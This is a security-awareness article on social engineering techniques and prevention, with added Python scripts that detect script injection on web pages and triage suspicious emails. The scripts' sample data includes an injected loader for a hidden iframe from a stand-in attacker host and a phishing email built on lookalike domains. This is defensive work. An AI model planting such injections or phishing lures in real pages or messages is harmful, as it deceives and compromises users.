What Is Social Engineering?

What Is A Social Engineering Attack And How To Prevent Them


Social engineering is recognized as one of the greatest security threats facing organizations. It is extremely effective because the attacks are persuasive and deceptive, and because they target people rather than software.


According to a recent cyber security report, 98% of cyber-attacks rely on some form of social engineering. The same report notes that 21% of current or former employees use social engineering to gain a financial advantage or to take revenge.


One of the most alarming findings in the report is that social engineering attempts spiked by more than 500% from the first to the second quarter of 2018.


What Is A Social Engineering Attack And How Does It Work?


Social engineering attacks come in many forms, but let’s first define the term. Social engineering is the psychological manipulation of people into performing actions or divulging confidential information.


It sounds like a Jedi mind trick, but in reality it is a trick based on human perception. Social engineering is the number one threat because it plays on our behavior and our tendency to trust.


Who Is Most At Risk Of Social Engineering Attacks?


Targets of a social engineering attack can range from a corporate executive to an elementary school student. Even the most seasoned IT professional can be victimized by this type of attack.


Interestingly, social engineering is also reported to rely on the principles of influence. If that is the case, anyone exposed to news media or advertising, or using a computer or smartphone connected to the Internet, is susceptible to this kind of attack.


The following excerpt from a report describing the principles of influence explains why social engineering works so well today.


  • Reciprocity – People tend to return a favor, hence the pervasiveness of free samples in marketing.
  • Commitment and consistency – If people commit to an idea or goal (orally or in writing), they are more likely to honor that commitment because it’s now congruent with their self-image. Even if the original incentive or motivation is removed after they have already committed, people will continue to honor the agreement.
  • Social proof – People will do things that they see others doing.
  • Authority – People will tend to obey authority figures, even if they’re asked by those figures to perform objectionable acts.
  • Liking – People are easily persuaded by others that they like.
  • Scarcity – Perceived scarcity will generate demand. For example, by saying offers are available for a “limited time only,” retailers encourage sales.


The good news is that we understand the problem; the bad news is that malicious actors already have systems in place to exploit the above principles of human behavior.


What Are Common Types of Social Engineering Techniques?


The most common social engineering techniques include phishing, watering hole attacks, pretexting, whaling and tailgating.


1. Phishing Attacks


No, this isn’t a typo. Phishing refers to an attack that is usually delivered as a link embedded in an email. The email is disguised to look like it comes from a trusted source, but the link leads to a malicious site, typically one built to harvest credentials or deliver malware.


2. Watering Hole


A watering hole attack consists of injecting malicious code into the public web pages of a site that the targets are known to visit. The injection method itself is not new and is commonly used by cyber criminals and hackers; what distinguishes a watering hole attack is the choice of target. The attackers compromise websites within a specific sector that are ordinarily visited by the individuals of interest, then wait for those individuals to come to them.
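Because the injected code lives on a site the defender does not control, the practical countermeasure on the visiting side is to notice when a trusted page starts loading something it never loaded before. The script below, an added example that is not part of the original article or PurpleSec's tooling, snapshots the external script sources and inline script hashes of a known-good page and diffs each later copy of the page against that baseline. Both HTML documents are constructed samples; the `.invalid` hostnames are placeholders.

```python
"""Detect script injection on a monitored web page by comparing the scripts it
loads against a known-good baseline (added example; constructed sample HTML)."""
import hashlib
from html.parser import HTMLParser


class ScriptCollector(HTMLParser):
    """Collect external <script src> values and SHA-256 digests of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = set()
        self.inline_hashes = set()
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.add(src.strip())
        else:
            # Inline script: buffer its body until the closing tag.
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            body = "".join(self._buf).strip().encode()
            self.inline_hashes.add(hashlib.sha256(body).hexdigest())
            self._in_script = False


def collect_scripts(html):
    """Return (external_sources, inline_script_hashes) for one HTML document."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.external, parser.inline_hashes


def find_injected_scripts(html, baseline_external, baseline_inline_hashes):
    """Return (new_external, new_inline_hashes): scripts absent from the baseline."""
    external, inline = collect_scripts(html)
    return (sorted(external - set(baseline_external)),
            sorted(inline - set(baseline_inline_hashes)))


# Constructed sample: the page as it looked when the baseline was taken.
BASELINE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script>window.cfg = {"env": "prod"};</script>
</head><body><h1>Industry Portal</h1></body></html>"""

# Constructed sample: the same page after a watering hole compromise added
# one external tracker and one inline loader for a hidden iframe.
COMPROMISED_HTML = """<html><head>
<script src="/static/app.js"></script>
<script>window.cfg = {"env": "prod"};</script>
<script src="https://cdn-stats-example.invalid/track.js"></script>
<script>document.write('<iframe src="https://attacker-example.invalid/x" width=0 height=0>');</script>
</head><body><h1>Industry Portal</h1></body></html>"""


if __name__ == "__main__":
    base_ext, base_inline = collect_scripts(BASELINE_HTML)
    new_ext, new_inline = find_injected_scripts(COMPROMISED_HTML, base_ext, base_inline)
    for src in new_ext:
        print("new external script:", src)
    for digest in new_inline:
        print("new inline script, sha256:", digest)
```

In practice the baseline is taken from a crawl you trust and refreshed only after a reviewed deployment; any new external origin or unknown inline script on the next crawl is an alert, not necessarily a compromise, because legitimate releases change scripts too.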


3. Pretexting


An attacker invents a plausible scenario (the pretext) and uses it to justify a request. For example, the attacker impersonates an external IT services operator and asks internal staff for information that would allow access to systems within the organization.


4. Whaling Attacks


Whaling uses the same methods as spear phishing, but the scam email is designed to masquerade as a critical business email from a legitimate authority, typically a senior executive of an important organization. The word whaling indicates that the target is a big fish.


5. Tailgating


The tailgating attack, also known as “piggybacking,” involves an attacker who lacks the proper credentials gaining entry to a restricted area.


The attacker simply walks in behind a person who is authorized to access the area. In a typical scenario, the attacker impersonates a delivery driver or a caretaker, arrives loaded with parcels and waits for an employee to hold the door open.


Example Of A Social Engineering Attack


I didn’t have to look far to find an example. I’ll share an incident involving a recent email that appeared in our mailbox.


It appears the attacker had everything right. The logo looks legitimate and I do have an account with this vendor, but something looked amiss. Mind you, I first saw this on my mobile device and I didn’t open any links. So I decided I needed to take a closer look on my desktop computer.


First rule of thumb when you believe an email is suspicious or have that “why did I receive this email?” feeling: DO NOT CLICK any URLs or links in the email. I’ll explain later, but first take a close look at the sender’s email address (note the explanation in the text box below).


[Image: Example Of A Social Engineering Attack - PurpleSec]


So what did I avoid by not clicking this suspicious email? I avoided exposing my user name and password to what appears to be a phony web site. They could also have asked for a credit card number or my bank details. Once they have my account info, game over.


To put this in perspective, imagine this attack being replicated 1,000 times daily for a year to a million people.


It’s astounding to calculate, but that’s the reality of why social engineering ranks so high among cyber security threats.


How Do You Prevent Social Engineering Attacks?


There are a variety of ways to prevent social engineering attacks. Many corporate environments conduct security awareness exercises throughout the year to inform their employees of security best practices in the workplace.


It is also commonplace for companies to simulate phishing attacks by sending fake emails to their employees to test their behavior.


You can prevent social engineering attacks, whether in the office or on a personal device, by following these recommendations.


Be Suspicious


Be suspicious of unsolicited phone calls, visits, or email messages from individuals asking about employees or other internal information. If an unknown individual claims to be from a legitimate organization, try to verify his or her identity directly with the company.


Do Not Provide Personal Information


Do not provide personal information or information about your organization, including its structure or networks, unless you are certain of a person’s authority to have the information.


Do Not Provide Financial Information


Do not reveal personal or financial information in email, and do not respond to email solicitations for this information. This includes following links sent in email.


Don’t Send Sensitive Information


Don’t send sensitive information over the internet before checking a website’s security. (See Protecting Your Privacy for more information.)


Pay Attention To URLs


Pay attention to the Uniform Resource Locator (URL) of a website. Malicious websites may look identical to a legitimate site, but the URL may use a variation in spelling, a lookalike character (a digit 1 for a letter l), a different domain (e.g., .com vs. .net), or the real brand name placed in a subdomain of an attacker-controlled domain (e.g., vendor.com.attacker.net).
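The two manual checks this article recommends, inspecting the sender's address and inspecting every URL before clicking, can be scripted so they are applied the same way to every suspicious message. The script below is an added example, not part of the original article or PurpleSec's tooling. It parses a raw email, compares the sender's domain and each link's hostname against the domain the message claims to come from, and reports the specific mismatch: a different top-level domain, a lookalike spelling, punycode, or the real domain embedded as a subdomain of another. The email is a constructed sample and `example-bank.com` stands in for the vendor's real domain; the "registrable domain" helper deliberately ignores multi-label public suffixes such as `co.uk`.

```python
"""Triage a suspicious email: does the sender's domain and every link in the
body actually belong to the vendor it claims to be? (Added example; the
message below is a constructed sample.)"""
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s<>\"')]+")


def registrable_domain(host):
    """Last two labels of a hostname. Simplification: ignores multi-label
    public suffixes such as co.uk; use a public suffix list in production."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def edit_distance(a, b):
    """Levenshtein distance, used to catch one-character misspellings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_host(host, legit_domain):
    """Return the reasons a hostname is not the vendor's, or [] if it is."""
    host = host.lower().rstrip(".")
    if host == legit_domain or host.endswith("." + legit_domain):
        return []  # the genuine domain or a real subdomain of it
    reasons = []
    if any(part.startswith("xn--") for part in host.split(".")):
        reasons.append("punycode hostname (possible homoglyph)")
    if ("." + legit_domain + ".") in ("." + host + "."):
        reasons.append("vendor domain used as a subdomain of " + registrable_domain(host))
    legit_label = legit_domain.rsplit(".", 1)[0]
    reg = registrable_domain(host)
    label, _, tld = reg.rpartition(".")
    # Fold the usual ASCII lookalikes before comparing: 1->l, 0->o, rn->m.
    folded = label.replace("1", "l").replace("0", "o").replace("rn", "m")
    if label == legit_label:
        reasons.append("same name on a different top-level domain (." + tld + ")")
    elif folded == legit_label or edit_distance(label, legit_label) <= 1:
        reasons.append("lookalike of " + legit_domain + ": " + reg)
    if not reasons:
        reasons.append("unrelated domain " + reg)
    return reasons


def check_sender(from_header, vendor_name, legit_domain):
    """Flag a display name that claims the vendor while the address does not."""
    name, addr = parseaddr(from_header)
    reasons = check_host(addr.rpartition("@")[2], legit_domain)
    if reasons and vendor_name.lower() in name.lower():
        reasons.insert(0, "display name claims to be " + vendor_name + " but address is " + addr)
    return addr, reasons


def triage(raw_email, vendor_name, legit_domain):
    """Run the sender and link checks over one raw RFC 822 message."""
    msg = message_from_string(raw_email)
    sender, sender_reasons = check_sender(msg.get("From", ""), vendor_name, legit_domain)
    links = {}
    for url in URL_RE.findall(msg.get_payload()):
        links[url] = check_host(urlparse(url).hostname or "", legit_domain)
    suspicious = bool(sender_reasons) or any(links.values())
    return {"sender": sender, "sender_reasons": sender_reasons, "links": links,
            "verdict": "suspicious" if suspicious else "no findings"}


# Constructed sample message; every hostname here is made up for the example.
SAMPLE_EMAIL = """From: Example Bank Support <alerts@example-bank-secure.net>
To: you@example.org
Subject: Action required: verify your account

Your account has been limited. Restore access within 24 hours at
https://example-bank.com.evil-host.net/login
or update your details at https://secure.examp1e-bank.com/verify
Manage alerts: https://www.example-bank.com/alerts
"""

if __name__ == "__main__":
    report = triage(SAMPLE_EMAIL, "Example Bank", "example-bank.com")
    print(report["verdict"], "-", report["sender"], report["sender_reasons"])
    for url, reasons in report["links"].items():
        print(url, "->", reasons or "ok")
```

Two caveats a practitioner should keep in mind: a clean `From:` domain proves little on its own, because the header is attacker-controlled unless SPF, DKIM and DMARC results say otherwise, and a link whose hostname passes these checks can still redirect elsewhere, so the verdict is a reason to look closer, never a reason to click.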


Verify The Company Contacting You


If you are unsure whether an email request is legitimate, try to verify it by contacting the company directly. Do not use contact information provided on a website connected to the request; instead, check previous statements for contact information. Information about known phishing attacks is also available online from groups such as the Anti-Phishing Working Group. (See the APWG eCrime Research Papers).


Install Attack Mitigations


Install and maintain anti-virus software, firewalls, and email filters to reduce some of this traffic. (See Understanding Firewalls, Understanding Anti-Virus Software, and Reducing Spam for more information.) Finally, take advantage of any anti-phishing features offered by your email client and web browser.

